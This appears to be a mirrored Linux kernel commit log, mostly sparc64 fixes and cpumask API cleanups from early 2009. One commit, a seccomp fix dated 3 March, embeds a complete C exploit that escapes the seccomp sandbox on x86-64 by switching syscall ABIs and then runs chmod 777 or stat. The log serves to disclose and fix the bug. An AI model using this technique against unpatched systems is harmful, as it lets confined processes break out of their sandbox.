- 31 3月, 2009 1 次提交
-
-
由 Alexey Dobriyan 提交于
Setting ->owner as done currently (pde->owner = THIS_MODULE) is racy as correctly noted at bug #12454. Someone can lookup entry with NULL ->owner, thus not pinning enything, and release it later resulting in module refcount underflow. We can keep ->owner and supply it at registration time like ->proc_fops and ->data. But this leaves ->owner as easy-manipulative field (just one C assignment) and somebody will forget to unpin previous/pin current module when switching ->owner. ->proc_fops is declared as "const" which should give some thoughts. ->read_proc/->write_proc were just fixed to not require ->owner for protection. rmmod'ed directories will be empty and return "." and ".." -- no harm. And directories with tricky enough readdir and lookup shouldn't be modular. We definitely don't want such modular code. Removing ->owner will also make PDE smaller. So, let's nuke it. Kudos to Jeff Layton for reminding about this, let's say, oversight. http://bugzilla.kernel.org/show_bug.cgi?id=12454Signed-off-by: NAlexey Dobriyan <adobriyan@gmail.com>
-
- 30 3月, 2009 3 次提交
-
-
由 Rusty Russell 提交于
Impact: cleanup It's unused, since about 1995. So remove all initialization of it in preparation for actually removing the field. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Acked-by: NThomas Gleixner <tglx@linutronix.de>
-
由 Rusty Russell 提交于
Everyone defines it, and only one person uses it (arch/mips/sgi-ip27/ip27-nmi.c). So just open code it there. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Cc: linux-mips@linux-mips.org
-
由 David S. Miller 提交于
Hypervisor versions older than version 1.6.1 cannot handle leaving the profile counter overflow interrupt chirping when the system does a soft reset. So use a reboot notifier to shut off the NMI watchdog. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 28 3月, 2009 1 次提交
-
-
由 David S. Miller 提交于
Sparc was missed in commit 2b1c6bd7 ("generic compat_sys_ustat"). We definitely need it, since our __kernel_ino_t is "unsigned long". Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 27 3月, 2009 2 次提交
-
-
由 David S. Miller 提交于
As explained by Benjamin Herrenschmidt: > CPU 0 is running the context, task->mm == task->active_mm == your > context. The CPU is in userspace happily churning things. > > CPU 1 used to run it, not anymore, it's now running fancyfsd which > is a kernel thread, but current->active_mm still points to that > same context. > > Because there's only one "real" user, mm_users is 1 (but mm_count is > elevated, it's just that the presence on CPU 1 as active_mm has no > effect on mm_count(). > > At this point, fancyfsd decides to invalidate a mapping currently mapped > by that context, for example because a networked file has changed > remotely or something like that, using unmap_mapping_ranges(). > > So CPU 1 goes into the zapping code, which eventually ends up calling > flush_tlb_pending(). Your test will succeed, as current->active_mm is > indeed the target mm for the flush, and mm_users is indeed 1. So you > will -not- send an IPI to the other CPU, and CPU 0 will continue happily > accessing the pages that should have been unmapped. To fix this problem, check ->mm instead of ->active_mm, and this means: > So if you test current->mm, you effectively account for mm_users == 1, > so the only way the mm can be active on another processor is as a lazy > mm for a kernel thread. So your test should work properly as long > as you don't have a HW that will do speculative TLB reloads into the > TLB on that other CPU (and even if you do, you flush-on-switch-in should > get rid of any crap here). And therefore we should be OK. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David Miller 提交于
arch/sparc/kernel/time_64.c: In function ‘timer_interrupt’: arch/sparc/kernel/time_64.c:732: error: ‘struct kernel_stat’ has no member named ‘irqs’ make[1]: *** [arch/sparc/kernel/time_64.o] Error 1 Signed-off-by: NDavid S. Miller <davem@davemloft.net> Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 26 3月, 2009 1 次提交
-
-
由 David S. Miller 提交于
tlb_flush_mmu() needs to flush pending TLB entries before processing the mmu_gather ->pages list. Noticed by Benjamin Herrenschmidt. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 19 3月, 2009 2 次提交
-
-
由 Mikulas Patocka 提交于
When you compile kernel on Sparc64 with heap memory checking and type "cat /proc/iomem", you get a crash, because pointers in struct resource are uninitialized. Most code fills struct resource with zeros, so I assume that it is responsibility of the caller of request_resource to initialized it, not the responsibility of request_resource functuion. After 2.6.29 is out, there could be a check for uninitialized fields added to request_resource to avoid crashes like this. Signed-off-by: NMikulas Patocka <mpatocka@redhat.com> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
Otherwise it might interrupt switch_to() midstream and use half-cooked register window state. Reported-by: NChris Torek <chris.torek@windriver.com> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 16 3月, 2009 10 次提交
-
-
由 Rusty Russell 提交于
Makes code futureproof against the impending change to mm->cpu_vm_mask. It's also a chance to use the new cpumask_ ops which take a pointer (the older ones are deprecated, but there's no hurry for arch code). Signed-off-by: NRusty Russell <rusty@rustcorp.com.au>
-
由 Rusty Russell 提交于
Impact: cleanup (Thanks to Al Viro for reminding me of this, via Ingo) CPU_MASK_ALL is the (deprecated) "all bits set" cpumask, defined as so: #define CPU_MASK_ALL (cpumask_t) { { ... } } Taking the address of such a temporary is questionable at best, unfortunately 321a8e9d (cpumask: add CPU_MASK_ALL_PTR macro) added CPU_MASK_ALL_PTR: #define CPU_MASK_ALL_PTR (&CPU_MASK_ALL) Which formalizes this practice. One day gcc could bite us over this usage (though we seem to have gotten away with it so far). So replace everywhere which used &CPU_MASK_ALL or CPU_MASK_ALL_PTR with the modern "cpu_all_mask" (a real struct cpumask *), and remove CPU_MASK_ALL_PTR altogether. Also remove the confusing and deprecated large-NR_CPUS-only "cpu_mask_all". Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Acked-by: NIngo Molnar <mingo@elte.hu> Reported-by: NAl Viro <viro@zeniv.linux.org.uk> Cc: Al Viro <viro@zeniv.linux.org.uk> Cc: Mike Travis <travis@sgi.com>
-
由 Rusty Russell 提交于
Impact: reduce stack usage for large NR_CPUS cpumask_of_pcibus() is the new version. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au>
-
由 Rusty Russell 提交于
Impact: cleanup cpu_coregroup_mask is the New Hotness. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au>
-
由 Rusty Russell 提交于
Impact: cleanup, futureproof In fact, all cpumask ops will only be valid (in general) for bit numbers < nr_cpu_ids. So use that instead of NR_CPUS in various places. This is always safe: no cpu number can be >= nr_cpu_ids, and nr_cpu_ids is initialized to NR_CPUS at boot. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Signed-off-by: NMike Travis <travis@sgi.com> Acked-by: NIngo Molnar <mingo@elte.hu>
-
由 Rusty Russell 提交于
Impact: cleanup, futureproof In fact, all cpumask ops will only be valid (in general) for bit numbers < nr_cpu_ids. So use that instead of NR_CPUS in various places. This is always safe: no cpu number can be >= nr_cpu_ids, and nr_cpu_ids is initialized to NR_CPUS at boot. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Signed-off-by: NMike Travis <travis@sgi.com> Acked-by: NIngo Molnar <mingo@elte.hu>
-
由 Rusty Russell 提交于
Impact: use new API Use the accessors rather than frobbing bits directly. Most of this is in arch code I haven't even compiled, but is straightforward. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Signed-off-by: NMike Travis <travis@sgi.com>
-
由 Rusty Russell 提交于
Impact: use new API Use the accessors rather than frobbing bits directly. Most of this is in arch code I haven't even compiled, but it is mostly straightforward. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Signed-off-by: NMike Travis <travis@sgi.com>
-
由 Rusty Russell 提交于
We're weaning the core code off handing cpumask's around on-stack. This introduces arch_send_call_function_ipi_mask(), and by defining it, the old arch_send_call_function_ipi is defined by the core code. Signed-off-by: NRusty Russell <rusty@rustcorp.com.au>
-
由 Rusty Russell 提交于
Impact: Use new API Change smp_call_function_mask() callers to smp_call_function_many(). Signed-off-by: NRusty Russell <rusty@rustcorp.com.au> Signed-off-by: NMike Travis <travis@sgi.com>
-
- 05 3月, 2009 1 次提交
-
-
由 David S. Miller 提交于
Based upon a report by Meelis Roos. Sparc64 SBUS and PCI controllers use a combination of IMAP and ICLR registers to manage device interrupts. The IMAP register contains the "valid" enable bit as well as CPU targetting information. Whereas the ICLR register is written with zero at the end of handling an interrupt to reset the state machine for that interrupt to IDLE so it can be sent again. For PCI slot and SBUS slot devices we can have multiple interrupts sharing the same IMAP register. There are individual ICLR registers but only one IMAP register for managing those. We represent each shared case with individual virtual IRQs so the generic IRQ layer thinks there is only one user of the IRQ instance. In such shared IMAP cases this is wrong, so if there are multiple active users then a free_irq() call will prematurely turn off the interrupt by clearing the Valid bit in the IMAP register even though there are other active users. Fix this by simply doing nothing in sun4u_disable_irq() and checking IRQF_DISABLED during IRQ dispatch. This situation doesn't exist in the hypervisor sun4v cases, so I left those alone. Tested-by: NMeelis Roos <mroos@linux.ee> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 03 3月, 2009 1 次提交
-
-
由 Roland McGrath 提交于
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: NRoland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 16 2月, 2009 1 次提交
-
-
由 Patrick Ohly 提交于
User space can request hardware and/or software time stamping. Reporting of the result(s) via a new control message is enabled separately for each field in the message because some of the fields may require additional computation and thus cause overhead. User space can tell the different kinds of time stamps apart and choose what suits its needs. When a TX timestamp operation is requested, the TX skb will be cloned and the clone will be time stamped (in hardware or software) and added to the socket error queue of the skb, if the skb has a socket associated with it. The actual TX timestamp will reach userspace as a RX timestamp on the cloned packet. If timestamping is requested and no timestamping is done in the device driver (potentially this may use hardware timestamping), it will be done in software after the device's start_hard_xmit routine. Signed-off-by: NPatrick Ohly <patrick.ohly@intel.com> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 11 2月, 2009 1 次提交
-
-
由 David S. Miller 提交于
Return was missing for the case where there is no dimm info match. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 09 2月, 2009 2 次提交
-
-
由 David S. Miller 提交于
This is based upon a report from Chris Torek and his initial patch. From Chris's report: -------------------- This came up in testing kgdb, using the built-in tests -- turn on CONFIG_KGDB_TESTS, then echo V1 > /sys/module/kgdbts/parameters/kgdbts -- but it would affect using kgdb if you were debugging and looking at bad pointers. -------------------- When we get a copy_{from,to}_user() request and the %asi is set to something other than ASI_AIUS (which is userspace) then we branch off to a routine called memcpy_user_stub(). It just does a straight memcpy since we are copying from kernel to kernel in this case. The logic was that since source and destination are both kernel pointers we don't need to have exception checks. But for what probe_kernel_{read,write}() is trying to do, we have to have the checks, otherwise things like kgdb bad kernel pointer accesses don't do the right thing. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
This is an implementation of a suggestion made by Chris Torek: -------------------- Something else I noticed in passing: the EX and EX_LD/EX_ST macros scattered throughout the various .S files make a fair bit of .fixup code, all of which does the same thing. At the cost of one symbol in copy_in_user.S, you could just have one common two-instruction retl-and-mov-1 fixup that they all share. -------------------- The following is with a defconfig build: text data bss dec hex filename 3972767 344024 584449 4901240 4ac978 vmlinux.orig 39688877 344024 584449 4897360 4aba50 vmlinux Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 06 2月, 2009 1 次提交
-
-
由 David S. Miller 提交于
They can't be used for profiling and NMI watchdog currently since they lack the counter overflow interrupt. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 05 2月, 2009 1 次提交
-
-
由 David S. Miller 提交于
Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 04 2月, 2009 1 次提交
-
-
由 David S. Miller 提交于
This builds upon eeabac73 ("sparc64: Validate kernel generated fault addresses on sparc64.") Upon further consideration, we actually should never see any fault addresses for 32-bit tasks with the upper 32-bits set. If it does every happen, by definition it's a bug. Whatever context created that fault would only have that fault satisfied if we used the full 64-bit address. If we truncate it, we'll always fault the wrong address and we'll always loop faulting forever. So catch such conditions and mark them as errors always. Log the error and fail the fault. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 03 2月, 2009 3 次提交
-
-
由 Stephen Rothwell 提交于
Signed-off-by: NStephen Rothwell <sfr@canb.auug.org.au> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
In order to handle all of the cases of address calculation overflow properly, we run sparc 32-bit processes in "address masking" mode when running on a 64-bit kernel. Address masking mode zeros out the top 32-bits of the address calculated for every load and store instruction. However, when we're in privileged mode we have to run with that address masking mode disabled even when accessing userspace from the kernel. To "simulate" the address masking mode we clear the top-bits by hand for 32-bit processes in the fault handler. It is the responsibility of code in the compat layer to properly zero extend addresses used to access userspace. If this isn't followed properly we can get into a fault loop. Say that the user address is 0xf0000000 but for whatever reason the kernel code sign extends this to 64-bit, and then the kernel tries to access the result. In such a case we'll fault on address 0xfffffffff0000000 but the fault handler will process that fault as if it were to address 0xf0000000. We'll loop faulting forever because the fault never gets satisfied. So add a check specifically for this case, when the kernel is faulting on a user address access and the addresses don't match up. This code path is sufficiently slow path, and this bug is sufficiently painful to diagnose, that this kind of bug check is warranted. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
When we're idling in NOHZ mode, timer interrupts are not running. Evidence of processing timer interrupts is what the NMI watchdog uses to determine if the CPU is stuck. On Niagara, we'll yield the cpu. This will make the cpu, at worst, hang out in the hypervisor until an interrupt arrives. This will prevent the NMI watchdog timer from firing. However on non-Niagara we just loop executing instructions which will cause the NMI watchdog to keep firing. It won't see timer interrupts happening so it will think the cpu is stuck. Fix this by touching the NMI watchdog in the cpu idle loop on non-Niagara machines. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 30 1月, 2009 1 次提交
-
-
由 David S. Miller 提交于
Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 29 1月, 2009 2 次提交
-
-
由 David S. Miller 提交于
Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
It all lives in the oprofile support code currently and we will need to share this stuff with NMI watchdog and perf_counter support. Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
- 27 1月, 2009 1 次提交
-
-
由 Jean Delvare 提交于
Now that all EEPROM drivers live in the same place, let's harmonize their symbol names. Also fix eeprom's dependencies, it definitely needs sysfs, and is no longer experimental after many years in the kernel tree. Signed-off-by: NJean Delvare <khali@linux-fr.org> Acked-by: NWolfram Sang <w.sang@pengutronix.de> Cc: David Brownell <dbrownell@users.sourceforge.net>
-
- 22 1月, 2009 2 次提交
-
-
由 David Miller 提交于
Changeset d7e51e66 ("sparseirq: make some func to be used with genirq") broke the build on sparc64: arch/sparc/kernel/irq_64.c: In function ‘show_interrupts’: arch/sparc/kernel/irq_64.c:188: error: ‘struct kernel_stat’ has no member named ‘irqs’ make[1]: *** [arch/sparc/kernel/irq_64.o] Error 1 Fix by using the kstat_irqs_cpu() interface. Signed-off-by: NDavid S. Miller <davem@davemloft.net> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 David Miller 提交于
Changeset d7e51e66 ("sparseirq: make some func to be used with genirq") broke the build on sparc64: arch/sparc/kernel/time_64.c: In function ‘timer_interrupt’: arch/sparc/kernel/time_64.c:732: error: implicit declaration of function ‘kstat_incr_irqs_this_cpu’ make[1]: *** [arch/sparc/kernel/time_64.o] Error 1 Signed-off-by: NDavid S. Miller <davem@davemloft.net> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 20 1月, 2009 2 次提交
-
-
由 David S. Miller 提交于
If we do a userspace access from kernel mode, and get a data access exception, we need to check the exception table just like a normal fault does. The spitfire DAX handler was doing this, but such logic was missing from the sun4v DAX code. Reported-by: NDennis Gilmore <dgilmore@redhat.com> Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-
由 David S. Miller 提交于
Signed-off-by: NDavid S. Miller <davem@davemloft.net>
-